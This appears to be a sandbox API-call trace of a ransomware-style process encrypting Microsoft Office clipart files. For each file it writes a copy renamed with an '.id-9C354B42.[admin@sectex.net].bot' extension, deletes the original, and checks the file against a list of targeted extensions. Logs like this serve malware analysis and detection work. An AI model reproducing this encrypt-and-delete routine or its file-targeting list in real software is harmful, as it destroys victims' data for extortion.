	[0143.243] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.243] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.243] GetLastError () returned 0x0
	[0143.243] ReadFile (in: hFile=0x2a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x634, lpOverlapped=0x0) returned 1
	[0143.278] WriteFile (in: hFile=0x3b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x640, lpOverlapped=0x0) returned 1
	[0143.279] ReadFile (in: hFile=0x2a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.279] WriteFile (in: hFile=0x3b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.279] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.279] CloseHandle (hObject=0x3b4) returned 1
	[0143.279] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.279] SetEndOfFile (hFile=0x2a0) returned 1
	[0143.281] CloseHandle (hObject=0x2a0) returned 1
	[0143.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.298] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf")) returned 1
	[0143.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63
	[0143.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63
	[0143.308] lstrlenW (lpString=".doc") returned 4
	[0143.308] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.308] lstrlenW (lpString=".docx") returned 5
	[0143.308] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.308] lstrlenW (lpString=".pdf") returned 4
	[0143.308] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.308] lstrlenW (lpString=".xls") returned 4
	[0143.308] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.308] lstrlenW (lpString=".xlsx") returned 5
	[0143.308] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.308] lstrlenW (lpString=".ppt") returned 4
	[0143.308] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63
	[0143.308] lstrlenW (lpString=".zip") returned 4
	[0143.308] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.308] lstrlenW (lpString=".rar") returned 4
	[0143.309] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.309] lstrlenW (lpString=".bz2") returned 4
	[0143.309] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.309] lstrlenW (lpString=".7z") returned 3
	[0143.309] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63
	[0143.309] lstrlenW (lpString=".dbf") returned 4
	[0143.309] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63
	[0143.309] lstrlenW (lpString=".1cd") returned 4
	[0143.309] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63
	[0143.309] lstrlenW (lpString=".jpg") returned 4
	[0143.309] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63
	[0143.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63
	[0143.309] lstrlenW (lpString=".doc") returned 4
	[0143.309] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.309] lstrlenW (lpString=".docx") returned 5
	[0143.309] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.309] lstrlenW (lpString=".pdf") returned 4
	[0143.309] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.309] lstrlenW (lpString=".xls") returned 4
	[0143.310] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.310] lstrlenW (lpString=".xlsx") returned 5
	[0143.310] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.310] lstrlenW (lpString=".ppt") returned 4
	[0143.310] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63
	[0143.310] lstrlenW (lpString=".zip") returned 4
	[0143.310] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.310] lstrlenW (lpString=".rar") returned 4
	[0143.310] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.310] lstrlenW (lpString=".bz2") returned 4
	[0143.310] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.310] lstrlenW (lpString=".7z") returned 3
	[0143.310] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63
	[0143.310] lstrlenW (lpString=".dbf") returned 4
	[0143.310] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63
	[0143.310] lstrlenW (lpString=".1cd") returned 4
	[0143.310] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63
	[0143.310] lstrlenW (lpString=".jpg") returned 4
	[0143.310] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.310] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.310] lstrlenW (lpString="BS00443_.WMF") returned 12
	[0143.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0143.311] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=1676) returned 1
	[0143.311] CloseHandle (hObject=0x384) returned 1
	[0143.311] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf")) returned 0x20
	[0143.311] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0143.311] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.311] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0143.312] GetLastError () returned 0x0
	[0143.312] ReadFile (in: hFile=0x384, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x68c, lpOverlapped=0x0) returned 1
	[0143.320] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x690, lpOverlapped=0x0) returned 1
	[0143.321] ReadFile (in: hFile=0x384, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.321] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.321] SetEndOfFile (hFile=0x31c) returned 1
	[0143.321] CloseHandle (hObject=0x31c) returned 1
	[0143.321] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.321] SetEndOfFile (hFile=0x384) returned 1
	[0143.323] CloseHandle (hObject=0x384) returned 1
	[0143.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.324] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf")) returned 1
	[0143.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63
	[0143.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63
	[0143.324] lstrlenW (lpString=".doc") returned 4
	[0143.324] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.324] lstrlenW (lpString=".docx") returned 5
	[0143.324] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.324] lstrlenW (lpString=".pdf") returned 4
	[0143.324] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.324] lstrlenW (lpString=".xls") returned 4
	[0143.324] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.324] lstrlenW (lpString=".xlsx") returned 5
	[0143.324] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.324] lstrlenW (lpString=".ppt") returned 4
	[0143.324] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63
	[0143.325] lstrlenW (lpString=".zip") returned 4
	[0143.325] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.325] lstrlenW (lpString=".rar") returned 4
	[0143.325] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.325] lstrlenW (lpString=".bz2") returned 4
	[0143.325] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.325] lstrlenW (lpString=".7z") returned 3
	[0143.325] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63
	[0143.325] lstrlenW (lpString=".dbf") returned 4
	[0143.325] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63
	[0143.325] lstrlenW (lpString=".1cd") returned 4
	[0143.325] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63
	[0143.325] lstrlenW (lpString=".jpg") returned 4
	[0143.325] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63
	[0143.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63
	[0143.325] lstrlenW (lpString=".doc") returned 4
	[0143.325] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.325] lstrlenW (lpString=".docx") returned 5
	[0143.325] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.325] lstrlenW (lpString=".pdf") returned 4
	[0143.325] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.325] lstrlenW (lpString=".xls") returned 4
	[0143.325] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.325] lstrlenW (lpString=".xlsx") returned 5
	[0143.325] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.325] lstrlenW (lpString=".ppt") returned 4
	[0143.325] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.325] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63
	[0143.325] lstrlenW (lpString=".zip") returned 4
	[0143.325] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.326] lstrlenW (lpString=".rar") returned 4
	[0143.326] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.326] lstrlenW (lpString=".bz2") returned 4
	[0143.326] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.326] lstrlenW (lpString=".7z") returned 3
	[0143.326] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63
	[0143.326] lstrlenW (lpString=".dbf") returned 4
	[0143.326] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63
	[0143.326] lstrlenW (lpString=".1cd") returned 4
	[0143.326] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63
	[0143.326] lstrlenW (lpString=".jpg") returned 4
	[0143.326] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.326] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.326] lstrlenW (lpString="BS00444_.WMF") returned 12
	[0143.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0143.399] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=3896) returned 1
	[0143.399] CloseHandle (hObject=0x38c) returned 1
	[0143.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf")) returned 0x20
	[0143.447] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.447] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.447] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.448] GetLastError () returned 0x0
	[0143.448] ReadFile (in: hFile=0x2a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xf38, lpOverlapped=0x0) returned 1
	[0143.490] WriteFile (in: hFile=0x3b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xf40, lpOverlapped=0x0) returned 1
	[0143.491] ReadFile (in: hFile=0x2a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.491] WriteFile (in: hFile=0x3b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.491] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.491] CloseHandle (hObject=0x3b4) returned 1
	[0143.491] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.491] SetEndOfFile (hFile=0x2a0) returned 1
	[0143.493] CloseHandle (hObject=0x2a0) returned 1
	[0143.493] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.494] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf")) returned 1
	[0143.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63
	[0143.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63
	[0143.494] lstrlenW (lpString=".doc") returned 4
	[0143.494] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.494] lstrlenW (lpString=".docx") returned 5
	[0143.494] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.494] lstrlenW (lpString=".pdf") returned 4
	[0143.494] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.494] lstrlenW (lpString=".xls") returned 4
	[0143.494] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.494] lstrlenW (lpString=".xlsx") returned 5
	[0143.494] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.494] lstrlenW (lpString=".ppt") returned 4
	[0143.494] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63
	[0143.494] lstrlenW (lpString=".zip") returned 4
	[0143.494] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.494] lstrlenW (lpString=".rar") returned 4
	[0143.494] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.495] lstrlenW (lpString=".bz2") returned 4
	[0143.495] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.495] lstrlenW (lpString=".7z") returned 3
	[0143.495] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63
	[0143.495] lstrlenW (lpString=".dbf") returned 4
	[0143.495] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63
	[0143.495] lstrlenW (lpString=".1cd") returned 4
	[0143.495] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63
	[0143.495] lstrlenW (lpString=".jpg") returned 4
	[0143.495] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63
	[0143.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63
	[0143.495] lstrlenW (lpString=".doc") returned 4
	[0143.495] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.495] lstrlenW (lpString=".docx") returned 5
	[0143.495] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.495] lstrlenW (lpString=".pdf") returned 4
	[0143.495] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.495] lstrlenW (lpString=".xls") returned 4
	[0143.495] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.495] lstrlenW (lpString=".xlsx") returned 5
	[0143.495] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.495] lstrlenW (lpString=".ppt") returned 4
	[0143.495] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63
	[0143.495] lstrlenW (lpString=".zip") returned 4
	[0143.495] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.495] lstrlenW (lpString=".rar") returned 4
	[0143.495] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.495] lstrlenW (lpString=".bz2") returned 4
	[0143.496] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.496] lstrlenW (lpString=".7z") returned 3
	[0143.496] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63
	[0143.496] lstrlenW (lpString=".dbf") returned 4
	[0143.496] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63
	[0143.496] lstrlenW (lpString=".1cd") returned 4
	[0143.496] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63
	[0143.496] lstrlenW (lpString=".jpg") returned 4
	[0143.496] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.496] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.496] lstrlenW (lpString="BS01603_.WMF") returned 12
	[0143.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0143.547] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=7176) returned 1
	[0143.547] CloseHandle (hObject=0x3c4) returned 1
	[0143.547] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf")) returned 0x20
	[0143.611] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.611] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
